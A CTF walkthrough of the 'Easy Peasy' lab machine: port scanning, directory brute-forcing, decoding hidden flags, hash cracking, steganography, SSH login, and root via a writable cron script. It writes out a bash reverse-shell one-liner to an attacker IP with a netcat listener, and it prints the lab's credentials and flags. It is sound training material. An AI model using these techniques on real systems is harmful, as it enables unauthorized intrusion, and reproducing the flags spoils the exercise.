Easy Peasy Walkthrough

Let’s start with another easy machine, Easy Peasy. You can access the machine from here.

First, like always, we start by scanning the machine’s ports, along with the services and their versions, using Nmap with the following command:

nmap -sC -sV Machine_IP

You should get something similar to the following:

Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-08 14:04 EDT
Nmap scan report for 10.10.238.226
Host is up (0.31s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.16.1
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: nginx/1.16.1
|_http-title: Welcome to nginx!

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.37 seconds

From the scan we can see the server has the following service running:

  • HTTP service (nginx 1.16.1) on port 80, which means the machine is reachable over HTTP and can be accessed from a browser.

But if we try to answer the first question, “how many ports are running”, with 1, we get a wrong answer; question 3 also hints that there is a higher port number.

So we run Nmap again to scan all ports on the machine, which we can do with the following command:

nmap 10.10.238.226 -p- -v

So the other services running are:

  • an HTTP service on port 65524 running Apache 2.4.43
  • an SSH service on port 6498 running OpenSSH 7.6p1

So the answer to the first question is:

3 ports

The version of nginx is:

1.16.1

and what’s running on the highest port is:

Apache

Now we are finished with the first part; the second part is about enumerating and compromising the machine.

First, if we access the machine in the browser on both ports 80 and 65524, we see the default pages for both nginx and Apache, so for now they won’t benefit us much.

Port 80 (default port): the default nginx welcome page.

Port 65524: the default Apache page (image: easy peasy apache server).

Let’s start enumerating the service running on port 80 for any hidden directories or files by using GoBuster:

gobuster dir --url http://Machine_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

After the scan finishes (you can run it for 15 minutes, which is more than enough for this machine) you will see the following directory being discovered:

/hidden (Status: 301)

If we access the directory, you should get the following website:

(image: easy peasy second image)

Let’s check the page source. There isn’t anything useful in it, so let’s do another enumeration on the /hidden page by running:

gobuster dir --url http://Machine_IP/hidden -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

After the scan finishes (again, 15 minutes is more than enough for this machine) you will see the following directory being discovered:

/whatever (Status: 301)

Let’s access the page; we get a blank page. But if we view the source code, we get the following hidden p tag:

<p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>

This is base64 encoding, so let’s decode the message with any online decoder, and we get the first flag.

flag{f1rs7_fl4g}

You can try to enumerate inside /whatever, but nothing will show up, so let’s go to the other service running on port 65524.

We will run the same command, but with the new port number added to the URL:

gobuster dir --url http://Machine_IP:65524 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

You can keep GoBuster running for 20 mins; I got nothing, so I turned it off. Now we need to look for other information.

Usually, any website has a few well-known files that we can look for. One of them is robots.txt, which tells crawlers such as Googlebot which parts of the site they may or may not index.

Let’s try to access the robots.txt file from the browser:

http://Machine_ip:65524/robots.txt

We get the following page, which says that only the flag can enter:

User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:a18672860d0510e5ab6699730763b250
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions

Now we know our flag is either encoded or hashed. Looking at the text, the smallest character is 0 and the largest is e, so this might be a hexadecimal value, since hexadecimal digits range from 0 to F (0 to 9, then A to F).

If we search online for a tool that converts hexadecimal to a string and decode it, we get a rubbish value, so let’s go to the other option, a hashed value. This is an MD5 hash because it has 32 hexadecimal characters (you can count them if you want).

A simple Google search will give you the decoded value, which is:

flag{1m_s3c0nd_fl4g}
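The two steps above (spot base64, then tell hex-encoded text apart from a hash by decoding it and by its length) are easy to do offline. This is an added example, not code from the original walkthrough; the two sample values are the hidden p tag and the robots.txt User-Agent shown above, and the hash-length table is the standard mapping of digest sizes to hex lengths.

```python
import base64
import binascii
import string

# Values taken from this walkthrough: the hidden <p> tag under /hidden/whatever
# and the User-Agent value from robots.txt on port 65524.
HIDDEN_TAG_VALUE = "ZmxhZ3tmMXJzN19mbDRnfQ=="
ROBOTS_USER_AGENT = "a18672860d0510e5ab6699730763b250"

# Hex length -> common unsalted digest of that size. 32 characters is ambiguous
# (MD5, MD4 and NTLM are all 128 bits), so the name is a guess to confirm, not proof.
HASH_LENGTHS = {
    32: "md5 (or another 128-bit digest such as NTLM)",
    40: "sha1",
    56: "sha224",
    64: "sha256",
    96: "sha384",
    128: "sha512",
}


def is_hex(value: str) -> bool:
    """True when every character is a hexadecimal digit (either case)."""
    return len(value) > 0 and all(c in string.hexdigits for c in value)


def try_base64(value: str):
    """Return the decoded text if value is strict base64 that decodes to printable ASCII, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def hex_decodes_to_text(value: str) -> bool:
    """True when the hex string decodes to printable ASCII, i.e. it was encoded text rather than a digest."""
    if not is_hex(value) or len(value) % 2:
        return False
    return all(32 <= b < 127 for b in bytes.fromhex(value))


def classify(value: str) -> str:
    """Explain what an unknown token most likely is, in the order the walkthrough tries."""
    if is_hex(value):
        if hex_decodes_to_text(value):
            return f"hex-encoded text -> {bytes.fromhex(value).decode()!r}"
        guess = HASH_LENGTHS.get(len(value))
        if guess:
            return f"{len(value)}-char hex that decodes to non-text bytes: likely a {guess} digest"
        return f"{len(value)}-char hex blob of unusual length"
    decoded = try_base64(value)
    if decoded is not None:
        return f"base64 -> {decoded!r}"
    return "unrecognised encoding"


if __name__ == "__main__":
    for token in (HIDDEN_TAG_VALUE, ROBOTS_USER_AGENT):
        print(token, "=>", classify(token))
```

The hex check comes first because a 32-character hex string is also syntactically valid base64; decoding it as base64 would just produce noise.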

So now for the third flag, which is supposed to be in a file called easypeasy.txt. If we try to access that page as http://machine ip:65524/easypeasy.txt or with different extensions, we won’t find the file. Also, we have already scanned the server with GoBuster and didn’t find anything, so another place to look is the source code of the page.

So if we open the page source in our browser and read through the document, we will see the following lines:

<li>
They are activated by symlinking available
configuration files from their respective
Fl4g 3 : flag{9fdafbd64c47471a8f54cd3fc64cd312}
*-available/ counterparts. These should be managed
by using our helpers

And there goes our third flag.

flag{9fdafbd64c47471a8f54cd3fc64cd312}

Now, the flag is an MD5 hash like the one before, so let’s try to Google it.

We get the word “candeger”, but when we try to use it, it gives a wrong answer, so let’s go back to the source code and check for other clues.

Just like before, you will find a hidden p tag with the value:

ObsJmP173N2X6dOrAgEAL0Vu

Let’s try different decoding techniques; you will find that it’s encoded in base62, which gives the following directory:

/n0th1ng3ls3m4tt3r

Now let’s access the directory. It gives us a matrix-style image without any hints, so let’s look at the page source.

We will see the following encoded string:

940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81

Let’s try interpreting it as hexadecimal; we get some random rubbish data.

Which means it’s probably a hashed password (TryHackMe already gave the hint that it’s a hash of a password), so let’s try to analyse the hash using the following website.

If you still don’t know the differences between hash types, this site will help you a lot. After we get the type, which is SHA2 (SHA-256, given the 64 hexadecimal characters), it’s time to crack it using the John the Ripper tool.

We will use the password list that they already gave us. Put the hash on its own in a file (here sha2pass), tell John the hash format, and point it at the wordlist (replace the placeholder with the path of the list provided):

john --format=raw-sha256 --wordlist=<wordlist file> sha2pass

and you will get the answer, which is:

mypasswordforthatjob

So now we need a username and a password to continue with the machine. But there’s no more information in the page source or hidden directories, which means the information is hidden somewhere else.

Where?! The images! So far we have neglected them, but maybe there’s information hidden inside them using steganography.

Let’s try solving the second image, since it’s probably open in your browser right now.

First, let’s download the image, then use a tool called steghide, which can hide and extract files hidden inside an image.

We use the --extract flag to extract any embedded data, along with -sf to select the stego file, which is our image:

steghide --extract -sf binarycodepixabay.jpg

Then we enter the password we obtained in the previous step, and you should get the success message:

wrote extracted data to "secrettext.txt".

Now let’s open the file with cat:

cat secrettext.txt

Wonderful, we get the username we’ve been looking for, along with the password in binary form:

username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

After we decode the password from binary to ASCII, we get the following result:

iconvertedmypasswordtobinary

And now let’s log in to SSH with the credentials we have, not forgetting to change the port to 6498 (using -p).

After we log in, we can see the file user.txt, and when we print it we get the following message:

User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}

So we know the flag is rotated. To find which rotation is used, we take the first word “synt”, because we know it’s supposed to be “flag”, and if we count how many letters apart the two are, we get the rotation, which is ROT13.

Aaaand we get our flag:

flag{n0wits33msn0rm4l}
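Both decodings in this part (the binary password from secrettext.txt and the rotated flag) are small enough to do by hand, but the “count how far synt is from flag” trick generalises to any Caesar rotation, not just ROT13. The added example below is not from the walkthrough; it decodes the binary string exactly as shown above and derives the shift from the known prefix, refusing to guess if the crib letters disagree with each other (which would mean it is not a plain rotation).

```python
import string

# Values from the walkthrough: the binary password in secrettext.txt and the rotated user flag.
BINARY_PASSWORD = (
    "01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 "
    "01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 "
    "01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 "
    "01101110 01100001 01110010 01111001"
)
ROTATED_FLAG = "synt{a0jvgf33zfa0ez4y}"


def binary_to_ascii(bits: str) -> str:
    """Decode whitespace-separated 8-bit groups into ASCII text."""
    groups = bits.split()
    if any(len(g) != 8 or set(g) - {"0", "1"} for g in groups):
        raise ValueError("expected whitespace-separated 8-bit binary groups")
    return "".join(chr(int(g, 2)) for g in groups)


def rot(text: str, shift: int) -> str:
    """Rotate letters by `shift` positions; digits and punctuation are left alone."""
    lower, upper = string.ascii_lowercase, string.ascii_uppercase
    out = []
    for ch in text:
        if ch in lower:
            out.append(lower[(lower.index(ch) + shift) % 26])
        elif ch in upper:
            out.append(upper[(upper.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def shift_from_crib(ciphertext: str, known_plaintext: str) -> int:
    """Work out the Caesar shift that maps the known prefix onto the start of the ciphertext.

    Every letter pair must agree on one shift; otherwise the text is not a simple rotation.
    """
    shifts = set()
    for c, p in zip(ciphertext, known_plaintext):
        if c.isalpha() and p.isalpha():
            shifts.add((ord(c.lower()) - ord(p.lower())) % 26)
    if len(shifts) != 1:
        raise ValueError(f"crib does not fit a single rotation: {sorted(shifts)}")
    return shifts.pop()


def unrotate_flag(ciphertext: str, crib: str = "flag") -> str:
    """Recover the plaintext flag by undoing the rotation implied by the crib."""
    return rot(ciphertext, -shift_from_crib(ciphertext, crib))


if __name__ == "__main__":
    print("password:", binary_to_ascii(BINARY_PASSWORD))
    print("shift:", shift_from_crib(ROTATED_FLAG, "flag"))
    print("flag:", unrotate_flag(ROTATED_FLAG))
```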

Now it’s time to escalate our privileges to get access to the root account. Let’s start by running the following find command, which lists SUID binaries (files that run with their owner’s privileges, usually root) that we might be able to use to get a root shell:

find / -perm -u=s -type f 2>/dev/null

You should get the following programs:

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/pppd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/bin/ping
/bin/mount
/bin/fusermount
/bin/su
/bin/umount

And now to the lovely GTFOBins to see how we can get a root shell using one of the above programs.

First, we see pkexec, which can run a shell as root, but when we try it, it asks for the root password, which we don’t have (and we can’t read the shadow file), so that’s a dead end.

boring@kral4-PC:~$ pkexec "/bin/sh"
==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===
Authentication is needed to run `/bin/sh' as the super user
Authenticating as: root
Password: 
polkit-agent-helper-1: pam_authenticate failed: Authentication failure
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized
This incident has been reported.

I’ve tried to research the others, but some didn’t work and others were just too old to be used.

But then, there is a service that runs when you log in and gives you the following message:

You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!

which is handled by a cron job scheduled in crontab, so let’s look at that file.

Let’s see the owner and permissions of crontab:

ls -la /etc/crontab

You will get the following result:

-rw-r--r-- 1 root root 792 Jun 15  2020 /etc/crontab

So the file is owned by root and we don’t have write permission on it, but let’s see what it executes:

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh

So it executes the following:

  • /etc/cron.hourly
  • /etc/cron.daily
  • /etc/cron.weekly
  • /etc/cron.monthly
  • .mysecretcronjob.sh

Now, the first four won’t be much use to us, because they run hourly, daily, weekly and monthly, and we’re not going to edit something inside them and then wait an hour for it to execute, so let’s check the last option, which runs every single minute as root.

So let’s check the permissions of the last file by running:

ls -la /var/www/.mysecretcronjob.sh 

And voilà!

-rwxr-xr-x 1 boring boring 33 Jun 14  2020 /var/www/.mysecretcronjob.sh

The file is owned by our user, so we can edit it: root runs, every minute, a script that a non-root user controls.

Let’s open the file with nano or whichever text editor you prefer.
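The misconfiguration here is easy to state and easy to check for: a root cron job whose command or script is owned or writable by someone other than root. The added example below (not from the walkthrough) parses a system crontab in the format shown above, resolves the paths each root job touches (including a script named relative to a preceding cd), and flags any that are not root-owned or are group/world writable. The crontab text is a constructed copy of the one above, the file-ownership table is constructed (uid 1000 for boring is an assumption), and live_lookup is the drop-in for running it against a real host.

```python
import os
import stat

# Constructed copy of the /etc/crontab shown in the walkthrough.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh
"""

# Constructed stand-in for the filesystem: path -> (owner uid, permission bits).
# uid 0 is root; uid 1000 for the 'boring' user is an assumption.
SAMPLE_FS = {
    "/usr/sbin/anacron": (0, 0o755),
    "/etc/cron.hourly": (0, 0o755),
    "/etc/cron.daily": (0, 0o755),
    "/etc/cron.weekly": (0, 0o755),
    "/etc/cron.monthly": (0, 0o755),
    "/var/www/.mysecretcronjob.sh": (1000, 0o755),   # -rwxr-xr-x boring boring
}


def parse_system_crontab(text: str):
    """Return (user, command) for each job line: five time fields, a user, then the command."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 6)
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return jobs


def referenced_paths(command: str, cwd: str = "/"):
    """Collect filesystem paths a command line references.

    Absolute tokens are taken as-is; a dotfile or *.sh token is resolved against
    the directory set by an earlier `cd <dir>` in the same command.
    """
    for sep in ("&&", "||", "(", ")", ";"):
        command = command.replace(sep, " ")
    tokens = command.split()
    paths, cur, i = [], cwd, 0
    while i < len(tokens):
        tok = tokens[i]
        if tok == "cd" and i + 1 < len(tokens):
            cur = tokens[i + 1]
            i += 2
            continue
        if tok.startswith("/"):
            paths.append(os.path.normpath(tok))
        elif tok.startswith(".") or tok.endswith(".sh"):
            paths.append(os.path.normpath(os.path.join(cur, tok)))
        i += 1
    return paths


def risk_reason(path: str, lookup):
    """Reason string if a file run by root can be changed by a non-root user, else None."""
    info = lookup(path)
    if info is None:
        return None
    uid, mode = info
    if uid != 0:
        return f"owned by uid {uid}, not root"
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return f"group/world writable (mode {oct(mode)})"
    return None


def audit_crontab(text: str, lookup):
    """List (path, reason) for every path a root job runs that a non-root user could modify."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in referenced_paths(command):
            reason = risk_reason(path, lookup)
            if reason:
                findings.append((path, reason))
    return findings


def sample_lookup(path: str):
    return SAMPLE_FS.get(path)


def live_lookup(path: str):
    """Same interface backed by a real stat(), for running the audit on an actual host."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return (st.st_uid, stat.S_IMODE(st.st_mode))


if __name__ == "__main__":
    for path, reason in audit_crontab(SAMPLE_CRONTAB, sample_lookup):
        print(f"FINDING: root cron job runs {path}: {reason}")
```

The fix on the server side is the mirror image of the finding: scripts run by root cron jobs should be owned by root with mode 755 or tighter, so the audit comes back empty.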

Now we need to add a script that gives us a root shell, using a technique called a reverse shell, where the target connects back to us and gives us access to its machine instead of us connecting to it (useful when we don’t know the root password, as in this case).

There are many reverse shells written in different languages that you can check at pentestmonkey.

Let’s use the bash reverse shell. We need to change the IP to our machine’s IP, and change the port or keep it as long as it doesn’t conflict with any service running on your device.

bash -i >& /dev/tcp/your_IP/your_port 0>&1

Now save the file, open a new terminal window/tab on your machine, and start a listener using the netcat tool with the following command:

nc -lvp your_port

And boom! You should get access to the root shell:

root@kral4-PC:/var/www# 

So let’s go back to the home directory and list all files, including hidden ones, by running:

ls -la

You should get the following result, including the hidden .root.txt flag file:

drwx------  5 root root 4096 Jun 15  2020 .
drwxr-xr-x 23 root root 4096 Jun 15  2020 ..
-rw-------  1 root root    2 May  8 21:23 .bash_history
-rw-r--r--  1 root root 3136 Jun 15  2020 .bashrc
drwx------  2 root root 4096 Jun 13  2020 .cache
drwx------  3 root root 4096 Jun 13  2020 .gnupg
drwxr-xr-x  3 root root 4096 Jun 13  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   39 Jun 15  2020 .root.txt
-rw-r--r--  1 root root   66 Jun 14  2020 .selected_editor

So let’s open the file and read the flag, and you will have the last flag for this machine.

flag{63a9f0ea7bb98050796b649e85481845}

And congrats, that was an easy peasy machine.